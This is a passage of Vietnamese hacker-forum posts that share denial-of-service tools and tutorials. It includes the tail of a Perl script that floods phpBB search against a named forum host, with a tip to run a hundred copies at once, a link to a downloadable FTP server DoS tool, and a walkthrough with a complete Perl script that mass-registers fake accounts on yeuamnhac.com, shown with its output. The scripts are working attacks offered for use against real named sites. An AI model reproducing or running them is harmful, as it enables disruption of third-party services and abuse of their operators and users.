+$x+&search_terms=any&search_author=&search_forum=- 1&search_time=0&search_fields=msgonly&search_cat=- 1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=800"; ## Posit Length $lrg = length $postit; ## Connect Socket with Variables Provided By User my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => "80", Proto => "tcp", ); die "\nCo loi xay ra: $!\n" unless $sock; ## Invia Search exploit phpbb by SpiderZ print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q= 0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en- US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); ## exploit phpbb by SpiderZ syswrite STDOUT, "."; ## exploit phpbb by SpiderZ $x++; } # www.spiderz.tk [2006] edi 2 cài này là đc HTML Code: $host = "svvn.ru"; $pth = "/forum/"; tip: để dos liên tục, rek tạo 1 file dos.bat trong đó thì cứ perl dos.pl copy 100 lần > server down 1 tuần :p rekcor (vniss) FTP Server DoS Các bạn down cái file này về : http://itvn4all.com/ftpserver_dos.zip Giải nén và chạy cái file trong đó . Cái này chỉ có tác dụng đối với các Server có ổ đĩa mềm Chính vì vậy mà nó dùng để DoS các server của Việt Nam là hay nhất . Vì thông thương ổ mềm chẳng được bảo vệ gì sất Tôi đã flood yeuamnhac.com như thế nào Đã lâu lắm rồi tôi không còn hứng thú về hacking và security, nhưng chỉ với vài lời động viên của MicrosoftX, DCH quyết định quay trở lại với giới underground mà lâu nay đã lãng quên Mở đầu cho cái ngày trọng đại ấy là việc flood yeuamnhac.com Sự việc ở đây là yeuamnhac đã chủ quan với việc nâng cấp lên vBB bản mới nhất nhưng webmaster lại quên turn on phần Image Verification đây chính là mấu chốt của vấn đề Ở đây tôi xin giới thiệu chương trình dùng để sniff packet rất nổi tiếng (đã từng được giới thiệu trong security365) Ethereal - Network Protocol Analyzer Ở đây xin nói rõ thêm về việc sử dụng Ethereal - Network Protocol Analyzer, nếu chỉ dùng riêng http header thì dễ mất thời gian và bị bỏ sót riêng tôi nhiều lần view source-code để lấy các hidden GET, ngay trong ví dụ này là việc nhanh chóng bị bỏ quên đọan agree rule: s=&do=register&url=$host$dir&nth=0&day=0&year=0&wh o=adult&agree=1 * Thứ 2 việc đọc qua Ethereal, các bạn xem ảnh, được trình bày khá kỹ càng và có nhiều description bên cạnh lọc bớt những đọan không cần thiết. Packet được sniff chặt chẽ, dễ dàng manage được những gì ta đã gửi lên server và toàn bộ những gì được nhận lại từ server * Tôi khi vòng quanh 1 target thì công cụ không thể thiếu vẫn là ethereal, chỉ 1 lúc lòng vòng lướt qua 1 target là sẽ có vô số gói tin bắt được đầy phong phú mọi người chưa dùng chưa hiểu hết được đâu :p * Có thể topic trên có phương pháp flood quá noob, tùy vào trình độ của người đọc Mong bài viết sẽ có ích với những newbie như tôi Đầu tiên ta sẽ sniff các phần đã được hidden để send tới server yeuamnhac, ở đây tôi highlight 2 đọan sau : Code: s=&do=register&url=$host$dir&nth=0&day=0&year=0&who=adult&agree=1 Để vượt qua phần Agree rule Code: s=&do=addmember&url=http%3A%2F%2Fwww.yeuamnhac.com%2Fmusic%2F &agree=1&password_md5=f27f6f1c7c5cbf4e3e192e0a47b85300&passwordconfir m_md5=f27f6f1c7c5cbf4e3e192e0a47b85300&username=dinhcaohack&password =&passwordconfirm=&email=dinhcaohack@yahoo.com&emailconfirm=dinhcaoh ack@yahoo.com&userfield%5Bfield5%5D=1&userfield%5Bfield5_set%5D=1&u serfield%5Bfield2%5D=HN&userfield%5Bfield2_set%5D=1&month=03&day=04 &year=1981&oldbirthday=&showbirthday=2&timezoneoffset=7&dst=2&options %5Badminemail%5D=1 http://rekcor.info/TUT_YAN/YAN3.JPG http://rekcor.info/TUT_YAN/YAN4.JPG Để ý rằng username bắt buộc phải > 6 chữ số password đã được mã hóa hash 2 lần (md5(md5(x).salt) email và email confirm Như vậy không hề có phần image confirmation nên có thể dễ dàng flood members nhanh chóng qua code perl sau : PHP Code: #!/usr/bin/perl use IO::Socket; $host = "www.yeuamnhac.com"; $dir = "music"; $times = 999999; $u_root_root = "HACKED_BY_DINHCAOHACK"; print "[+] Bat dau tan cong $host.$dir.voi so lan flood.$times. \n"; for($i=1;$i<=$times;$i++) { $h = $i++; $u_rootser = $u_root.$h; $mail = "$u_rootser%40HACKED_BY_DINHCAOHACK$i.com"; $post1 = "s=&do=register&url=$host$dir&nth=0&day=0&year=0&who=adult&ag ree=1"; $post2 = "s=&do=addmember&url=http%3A%2F%2Fwww.yeuamnhac.com%2F music%2F&agree=1&password_md5=f27f6f1c7c5cbf4e3e192e0a47b85300&pass wordconfirm_md5=f27f6f1c7c5cbf4e3e192e0a47b85300&username=$u_rootser& password=&passwordconfirm=&email=$mail&emailconfirm=$mail&userfield%5 Bfield5%5D=1&userfield%5Bfield5_set%5D=1&userfield%5Bfield2%5D=HN&u serfield%5Bfield2_set%5D=1&month=03&day=04&year=1981&oldbirthday=&sh owbirthday=2&timezoneoffset=7&dst=2&options%5Badminemail%5D=1"; print "[+] $u_rootser da duoc thiep lap !\n"; $ss = IO::Socket::INET- >new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[- ] Khong the ket noi"; print $ss "POST /music/register.php?do=addmember HTTP/1.1\r\n"; print $ss "Host: $host\n"; print $ss "Content-Type: application/x-www-form-urlencoded\n"; print $ss "Content-length: ".length($post1)."\r\n\r\n"; print $ss "$post1"; print $ss "\r\n\r\n"; $ss = IO::Socket::INET- >new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[- ] Khong the ket noi"; print $ss "POST /music/register.php?do=addmember HTTP/1.1\r\n"; print $ss "Host: $host\n"; print $ss "Content-Type: application/x-www-form-urlencoded\n"; print $ss "Content-length: ".length($post2)."\r\n\r\n"; print $ss "$post2"; print $ss "\r\n\r\n"; sleep 2; } print "[+] Flooded Succesfully \n"; Để ý rằng nếu 0 có hàm flood server MySQL dễ bị sụp nhanh và tất nhiên cũng phục hồi nhanh -> Hàm sleep để cho khi anh em flood tác dụng chậm đi nhưng có tác dụng hơn Kết quả : Code: -bash-2.05b$ perl dos.pl [+] Bat dau tan cong www.yeuamnhac.com.music.voi so lan flood.999999. [+] HACKED_BY_DINHCAOHACK1 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK3 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK5 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK7 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK9 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK11 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK13 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK15 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK17 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK19 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK21 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK23 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK25 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK27 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK29 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK31 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK33 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK35 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK37 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK39 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK41 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK43 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK45 da duoc thiep lap ! [+] HACKED_BY_DINHCAOHACK47 da duoc thiep lap ! http://rekcor.info/TUT_YAN/YAN1.JPG http://rekcor.info/TUT_YAN/YAN2.JPG P.S : Gửi đến YAN Mình không biết YM! admin nên không thể report được dù gì thì sau vụ này YAN cũng được thêm khối thành viên nhé Admin chỉ cần thêm vào mỗi Image Verification thôi Quà tặng trên gửi đến yeuamnhac.vn -> Thanks quantalon for his HAO's DB dinhcaohack (vniss) Invision Power Board Multiple Users DOS PHP Code: